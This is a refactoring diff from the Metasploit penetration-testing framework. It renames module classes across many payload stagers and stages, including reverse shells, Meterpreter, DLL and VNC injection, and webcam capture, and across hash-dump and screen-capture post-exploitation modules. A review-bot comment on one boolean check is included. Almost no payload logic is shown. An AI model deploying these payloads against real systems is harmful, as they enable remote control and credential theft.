--- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index c6cb7bdd9e..d247665c49 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/find_tag' -module Metasploit3 +module MetasploitModule CachedSize = 92 diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 229d85f518..e87918864c 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -7,7 +7,7 @@ require 'uri' require 'msf/core' require 'msf/core/handler/reverse_hop_http' -module Metasploit3 +module MetasploitModule CachedSize = 353 diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 572d1c282d..00f5f71f00 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 327 diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb index d6f375b31a..cf7dd5013e 100644 --- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb +++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb 
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_http'
 require 'msf/core/payload/uuid/options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 665
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index 0b35881fd0..cecdfc5236 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/reverse_https'
-module Metasploit4
+module MetasploitModule
 CachedSize = 347
diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb
index f9a1e0dbf2..e867e144e6 100644
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_https_proxy'
-module Metasploit3
+module MetasploitModule
 CachedSize = 397
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
index 0acf1daf15..7ac254aedf 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 289
diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb
index 6eb08ee213..dc45f124bc 100644
--- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 177
diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb
index 40efd115c0..8bb52ba25b 100644
--- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 93
diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb
index 8fe18aabd6..dd41230c11 100644
--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/reverse_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 281
diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb
index 27ce0529fa..8a4c884b09 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp_allports'
-module Metasploit3
+module MetasploitModule
 CachedSize = 282
diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb
index 2f8af0662e..d987892c39 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 356
diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
index 6374045fac..66bc73cf6a 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
@@ -9,7 +9,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 394
diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
index 24d29b7e81..d06493861c 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
@@ -9,7 +9,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 469
diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
index c77c5d056a..b4895a83e6 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/reverse_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 314
diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb
index 874c43ba8e..134cac75ad 100644
--- a/modules/payloads/stagers/windows/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/reverse_winhttp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_http'
 require 'msf/core/payload/windows/reverse_winhttp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 357
diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb
index 2fc30a16ae..6008bb28d2 100644
--- a/modules/payloads/stagers/windows/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/reverse_winhttps.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/reverse_winhttps'
-module Metasploit4
+module MetasploitModule
 CachedSize = 377
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
index 58fc21b52a..e1d78ea07e 100644
--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/x64/bind_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 485
diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
index b0db550f7a..d1904d511f 100644
--- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/x64/bind_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 526
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb
index 138a5ec914..82e0c9be24 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/x64/bind_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 483
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
index 03d791ba5f..835504e1a2 100644
--- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
 require 'msf/core/payload/windows/x64/bind_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 524
diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb
index 4ae5af6697..4f6e40d6a5 100644
--- a/modules/payloads/stagers/windows/x64/reverse_http.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_http.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_http'
 require 'msf/core/payload/windows/x64/reverse_http'
-module Metasploit4
+module MetasploitModule
 CachedSize = 501
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
index 8e5a2fc1f5..a551986762 100644
--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/x64/reverse_https'
-module Metasploit4
+module MetasploitModule
 CachedSize = 532
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
index e2c271e2ed..ce2cee737e 100644
--- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/x64/reverse_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 449
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
index 9556fca229..48f58ea558 100644
--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/x64/reverse_tcp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 490
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
index d87820e334..a0d5afab18 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_http'
 require 'msf/core/payload/windows/x64/reverse_winhttp'
-module Metasploit4
+module MetasploitModule
 CachedSize = 532
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
index 03c844f58b..26d441fcba 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_https'
 require 'msf/core/payload/windows/x64/reverse_winhttps'
-module Metasploit4
+module MetasploitModule
 CachedSize = 563
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index fe89735e12..46164578f3 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
-module Metasploit4
+module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/android/shell.rb b/modules/payloads/stages/android/shell.rb
index 5b68d4b419..8f47b6b436 100644
--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 # The stager should have already included this
 #include Msf::Payload::Java
diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb
index 5c7f5d9337..ef5ae90f85 100644
--- a/modules/payloads/stages/bsd/x86/shell.rb
+++ b/modules/payloads/stages/bsd/x86/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb
index 1d18809993..1d0f00bfcb 100644
--- a/modules/payloads/stages/bsdi/x86/shell.rb
+++ b/modules/payloads/stages/bsdi/x86/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb
index f0e666349d..050f5ad0c4 100644
--- a/modules/payloads/stages/java/meterpreter.rb
+++ b/modules/payloads/stages/java/meterpreter.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_java'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit4
+module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb
index 16b71199e7..a5803f978a 100644
--- a/modules/payloads/stages/java/shell.rb
+++ b/modules/payloads/stages/java/shell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 # The stager should have already included this
 #include Msf::Payload::Java
diff --git a/modules/payloads/stages/linux/armle/shell.rb b/modules/payloads/stages/linux/armle/shell.rb
index d53f725bb0..feffd67cfd 100644
--- a/modules/payloads/stages/linux/armle/shell.rb
+++ b/modules/payloads/stages/linux/armle/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb
index d6063cdc24..77207e50e1 100644
--- a/modules/payloads/stages/linux/mipsbe/shell.rb
+++ b/modules/payloads/stages/linux/mipsbe/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb
index c74c633f36..b81b1c1848 100644
--- a/modules/payloads/stages/linux/mipsle/shell.rb
+++ b/modules/payloads/stages/linux/mipsle/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb
index caf23a4953..288128f864 100644
--- a/modules/payloads/stages/linux/x64/shell.rb
+++ b/modules/payloads/stages/linux/x64/shell.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb
index 6b1a2c0e67..ac4534dfe1 100644
--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@@ -8,7 +8,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/elfparsey'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
 def initialize(info = {})
diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb
index 691d5e1fbc..e24fbdbaf7 100644
--- a/modules/payloads/stages/linux/x86/shell.rb
+++ b/modules/payloads/stages/linux/x86/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Linux
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb
index 7f7dab8e47..7b89646c4b 100644
--- a/modules/payloads/stages/netware/shell.rb
+++ b/modules/payloads/stages/netware/shell.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb
index 3e9bb5a785..61763bd6dc 100644
--- a/modules/payloads/stages/osx/armle/execute.rb
+++ b/modules/payloads/stages/osx/armle/execute.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb
index f356a820a8..93b7538385 100644
--- a/modules/payloads/stages/osx/armle/shell.rb
+++ b/modules/payloads/stages/osx/armle/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb
index 2d0b8d7457..56711ae784 100644
--- a/modules/payloads/stages/osx/ppc/shell.rb
+++ b/modules/payloads/stages/osx/ppc/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb
index cda4f9f07a..33efebef0a 100644
--- a/modules/payloads/stages/osx/x64/dupandexecve.rb
+++ b/modules/payloads/stages/osx/x64/dupandexecve.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb
index 3204ba2a67..4a5650a2ea 100644
--- a/modules/payloads/stages/osx/x86/bundleinject.rb
+++ b/modules/payloads/stages/osx/x86/bundleinject.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/osx/bundleinject'
 # Injects an arbitrary DLL in the exploited process.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Osx::BundleInject
diff --git a/modules/payloads/stages/osx/x86/isight.rb b/modules/payloads/stages/osx/x86/isight.rb
index 4b4a7d57a4..2c926ad6a9 100644
--- a/modules/payloads/stages/osx/x86/isight.rb
+++ b/modules/payloads/stages/osx/x86/isight.rb
@@ -16,7 +16,7 @@ require 'msf/base/sessions/command_shell_options'
 # Injects the VNC server DLL and runs it over the established connection.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Osx::BundleInject
 include Msf::Sessions::CommandShellOptions
@@ -80,7 +80,7 @@ module Metasploit3
 print_status("Photo saved as #{dest}")
- if (datastore['AUTOVIEW'] == true)
+ if datastore['AUTOVIEW']
 print_status("Opening photo in a web browser...")
 Rex::Compat.open_browser(File.expand_path(dest))
 end
diff --git a/modules/payloads/stages/osx/x86/vforkshell.rb b/modules/payloads/stages/osx/x86/vforkshell.rb
index bd6acff024..5dc5b6a4fd 100644
--- a/modules/payloads/stages/osx/x86/vforkshell.rb
+++ b/modules/payloads/stages/osx/x86/vforkshell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index 90629b2715..4be5f679e3 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_php'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit4
+module MetasploitModule
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index 3c668327b5..6945059910 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader'
 require 'msf/base/sessions/meterpreter_python'
 require 'msf/base/sessions/meterpreter_options'
-module Metasploit4
+module MetasploitModule
 include Msf::Payload::Python::MeterpreterLoader
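Review bot: In the second hunk of `modules/payloads/stages/osx/x86/isight.rb`, `if datastore['AUTOVIEW']` is not equivalent to the removed `== true` test: it is truthy for every value except `nil` and `false`, so a string such as `"false"` would now take the branch. Whether such a value can reach this line depends on how AUTOVIEW is registered and normalised, which is outside the hunk, as is the start of the enclosing method. The branch passes `dest` to the operator's local browser, and judging by the status message that file holds data received from the remote session, so the gate should stay strict. If the option is a registered boolean, say so in a comment such as `# AUTOVIEW is an OptBool; the datastore value is already true/false`; otherwise keep an explicit comparison.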
diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb
index a14584d726..2c6a5adc72 100644
--- a/modules/payloads/stages/windows/dllinject.rb
+++ b/modules/payloads/stages/windows/dllinject.rb
@@ -13,7 +13,7 @@ require 'msf/core/payload/windows/reflectivedllinject'
 # Injects an arbitrary DLL in the exploited process via a reflective loader.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows::ReflectiveDllInject
diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb
index 2363cb9a45..7d2c7a4fdc 100644
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
@@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config'
 #
 ###
-module Metasploit4
+module MetasploitModule
 include Msf::Payload::Windows::MeterpreterLoader
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb
index a96ae18956..9228ccd055 100644
--- a/modules/payloads/stages/windows/patchupdllinject.rb
+++ b/modules/payloads/stages/windows/patchupdllinject.rb
@@ -11,7 +11,7 @@ require 'msf/core/payload/windows/dllinject'
 # Injects an arbitrary DLL in the exploited process.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows::DllInject
diff --git a/modules/payloads/stages/windows/patchupmeterpreter.rb b/modules/payloads/stages/windows/patchupmeterpreter.rb
index fc66ab5998..3a61de9590 100644
--- a/modules/payloads/stages/windows/patchupmeterpreter.rb
+++ b/modules/payloads/stages/windows/patchupmeterpreter.rb
@@ -14,7 +14,7 @@ require 'msf/base/sessions/meterpreter_options'
 # Injects the meterpreter server instance DLL via the DLL injection payload.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows::DllInject
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb
index 80f95c50f6..4a5f9e9b93 100644
--- a/modules/payloads/stages/windows/shell.rb
+++ b/modules/payloads/stages/windows/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb
index 1d833ed93a..8d71bd79f7 100644
--- a/modules/payloads/stages/windows/upexec.rb
+++ b/modules/payloads/stages/windows/upexec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb
index 5f78fd44ac..3683471406 100644
--- a/modules/payloads/stages/windows/vncinject.rb
+++ b/modules/payloads/stages/windows/vncinject.rb
@@ -15,7 +15,7 @@ require 'msf/base/sessions/vncinject_options'
 # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows::ReflectiveDllInject
 include Msf::Sessions::VncInjectOptions
diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb
index 690d4aac11..93127b2728 100644
--- a/modules/payloads/stages/windows/x64/meterpreter.rb
+++ b/modules/payloads/stages/windows/x64/meterpreter.rb
@@ -17,7 +17,7 @@ require 'rex/payloads/meterpreter/config'
 #
 ###
-module Metasploit4
+module MetasploitModule
 include Msf::Payload::Windows::MeterpreterLoader_x64
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb
index 4e511bd5ff..043f12be1a 100644
--- a/modules/payloads/stages/windows/x64/shell.rb
+++ b/modules/payloads/stages/windows/x64/shell.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows
 include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb
index 8490da03e2..0b9ef245f4 100644
--- a/modules/payloads/stages/windows/x64/vncinject.rb
+++ b/modules/payloads/stages/windows/x64/vncinject.rb
@@ -13,7 +13,7 @@ require 'msf/base/sessions/vncinject_options'
 # Injects the VNC server DLL (via Reflective Dll Injection) and runs it over the established connection.
 #
 ###
-module Metasploit3
+module MetasploitModule
 include Msf::Payload::Windows::ReflectiveDllInject_x64
 include Msf::Sessions::VncInjectOptions
diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb
index dd9de9fc96..fa87300d18 100644
--- a/modules/post/aix/hashdump.rb
+++ b/modules/post/aix/hashdump.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex'
-class Metasploit3 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::File
 include Msf::Post::Linux::Priv
diff --git a/modules/post/android/capture/screen.rb b/modules/post/android/capture/screen.rb
index 678d228d01..fd59559c57 100644
--- a/modules/post/android/capture/screen.rb
+++ b/modules/post/android/capture/screen.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex'
-class Metasploit4 < Msf::Post
+class MetasploitModule < Msf::Post
 include Msf::Post::File
